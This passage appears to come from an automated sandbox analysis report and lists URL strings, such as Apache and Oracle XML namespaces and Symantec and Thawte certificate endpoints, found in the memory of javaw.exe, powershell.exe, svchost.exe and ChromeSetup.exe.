Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory8
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validator/dtd
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/validator/schema
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler;
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/locale
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocation
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocation
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/security-manager
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypes
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypesxc
Source: javaw.exe, 00000002.00000002.3385302759.0000000009FDB000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3392107747.000000006CC33000.00000002.00000001.01000000.0000000B.sdmp, java.dll.0.dr String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: javaw.exe, 00000002.00000002.3392107747.000000006CC33000.00000002.00000001.01000000.0000000B.sdmp, java.dll.0.dr String found in binary or memory: http://bugreport.sun.com/bugreport/java.vendor.url.bughttp://java.oracle.com/java.vendor.urljava.ven
Source: powershell.exe, 00000005.00000002.1095173503.0000000007001000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.miZT
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: svchost.exe, 00000007.00000002.2860702019.000001C7D6C00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000007.00000003.1203071644.000001C7D6B10000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: javaw.exe, 00000002.00000002.3392107747.000000006CC33000.00000002.00000001.01000000.0000000B.sdmp, javaw.exe, 00000002.00000002.3385302759.0000000009FE0000.00000004.00001000.00020000.00000000.sdmp, java.dll.0.dr String found in binary or memory: http://java.oracle.com/
Source: javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/jaxp/xpath/dom
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/dom/properties/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-check
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSource
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSource;
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/schema/features/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/schema/features/)
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A5FD000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtd
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-state
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A5FD000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/report-cdata-event
Source: fxplugins.dll.0.dr String found in binary or memory: http://javafx.com/
Source: fxplugins.dll.0.dr String found in binary or memory: http://javafx.com/vp6decoderflvdemux
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/feature/secure-processing
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTDR
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchema
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalStylesheet
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalStylesheet8
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.dom.DOMResult/feature
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.dom.DOMSource/feature
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.sax.SAXResult/feature#
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.sax.SAXSource/feature
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature/xmlfilter
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.stax.StAXResult/feature
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.stax.StAXSource/feature
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.stream.StreamResult/feature
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.stream.StreamResult/feature-
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.stream.StreamSource/feature
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.stream.StreamSource/feature6
Source: ChromeSetup.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000005.00000002.1093282660.00000000059B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr String found in binary or memory: http://ocsp.thawte.com0
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://openjdk.java.net/jeps/220).
Source: powershell.exe, 00000005.00000002.1091230564.0000000004AA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr String found in binary or memory: http://s2.symcb.com0
Source: powershell.exe, 00000005.00000002.1091230564.0000000004AA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000005.00000002.1091230564.0000000004951000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1091230564.0000000004AA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr String found in binary or memory: http://sv.symcd.com0&
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: powershell.exe, 00000005.00000002.1091230564.0000000004AA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/feature/use-service-mechanism
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.oracle.com/hotspot/jvm/
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.oracle.com/hotspot/jvm/java/monitor/address
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.oracle.com/hotspot/jvm/vm/code_sweeper/id
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.oracle.com/hotspot/jvm/vm/compiler/id
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.oracle.com/hotspot/jvm/vm/gc/id
Source: javaw.exe, 00000002.00000002.3385302759.000000000A83D000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/technetwork/java/javafx/index.html
Source: javaw.exe, 00000002.00000003.1078463404.0000000015805000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.0000000015805000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/technetwork/java/javafx/index.htmlL
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.oracle.com/technetwork/java/javaseproducts/
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.oracle.com/technetwork/java/javaseproducts/C:
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/is-standalone
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementAttributeLimit
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/enableExtensionFunctions
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityExpansionLimit
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfo
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfo%
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepth
Source: javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxGeneralEntitySizeLimit
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimit
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimit
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimit#
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxXMLNameLimit
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimit
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManager
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManager;
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr String found in binary or memory: http://www.symauth.com/cps0(
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr String found in binary or memory: http://www.symauth.com/rpa00
Source: javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.apache.org/xalan
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.apache.org/xpath/features/whitespace-pre-stripping
Source: javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.apache.org/xslt
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/external-general-entities
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/external-parameter-entities
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/external-parameter-entities8
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespaces
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespacesv
